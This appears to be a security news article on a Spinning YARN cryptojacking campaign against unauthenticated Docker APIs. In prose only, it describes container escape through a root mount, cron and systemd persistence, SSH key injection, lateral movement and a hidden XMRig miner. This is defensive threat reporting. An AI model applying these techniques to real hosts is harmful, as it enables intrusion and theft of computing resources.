Hackers are using new techniques to target Docker API -

The Spinning YARN attackers have initiated a fresh cryptojacking campaign, focusing on publicly exposed Docker Engine hosts.

They utilize new binaries like chkstart for remote access with payload execution, exeremo for SSH lateral movement, and vurld as a Go downloader for malware retrieval. Their persistence method modifies systemd services via ExecStartPost to execute malicious commands.

New techniques to target Docker API

This campaign targets Docker API endpoints lacking authentication and shares tactics, techniques, and procedures (TTPs) with Spinning YARN, suggesting a connection. Analysis of payload specifics is crucial to tracking the evolution of these campaigns, which recycle names for updated or replaced payloads.

The Spinning YARN malware campaign targets misconfigured Docker, Apache Hadoop, Redis, and Confluence servers. It infects systems by scanning for open port 2375 and deploying an Alpine Linux container. This container exploits the Docker host by binding to the root directory, granting the attacker full system access.

The attacker establishes persistence by adding cron jobs that fetch and execute malicious shell scripts. These scripts download additional tools and payloads to disable security measures, steal information, and potentially install cryptomining software.

The chkstart malware achieves persistence on an Amazon Linux EC2 instance by altering systemd unit files.

It targets enabled systemd services and injects a malicious command (ExecStartPost) to execute a hidden binary named “top” during startup. According to Datadog Security Researchers, it modifies the SSH daemon configuration to accept SSH keys from specific locations, allowing unauthorized access by adding the attacker’s own key.

Once established, the “top” binary, identified as a custom-built XMRig cryptocurrency miner, exploits the compromised system’s resources for crypto mining.

Exeremo, a malicious Go binary, gathers usernames, hostnames, SSH keys, and port information from compromised servers’ shell history, SSH configurations, and known_hosts files. It uses this data to spread laterally by connecting to other SSH servers and executing a remote shell script (ar.sh).

Additionally, Exeremo retrieves and runs another script (s.sh) that installs scanning tools and deploys a custom Docker discovery utility. s.sh disguises a malicious binary (sd) as a common HTTPD process and sets up persistence using systemd.

The newly discovered payloads, sd/httpd and fkoths, are both Go ELF binaries. sd/httpd scans for vulnerable Docker Engine hosts and exploits them using the described techniques.

Meanwhile, fkoths removes Docker images created during the initial infection and modifies the hosts file to block communication with the Docker registry. This indicates ongoing development in the Spinning YARN campaign, though it does not introduce new functionalities.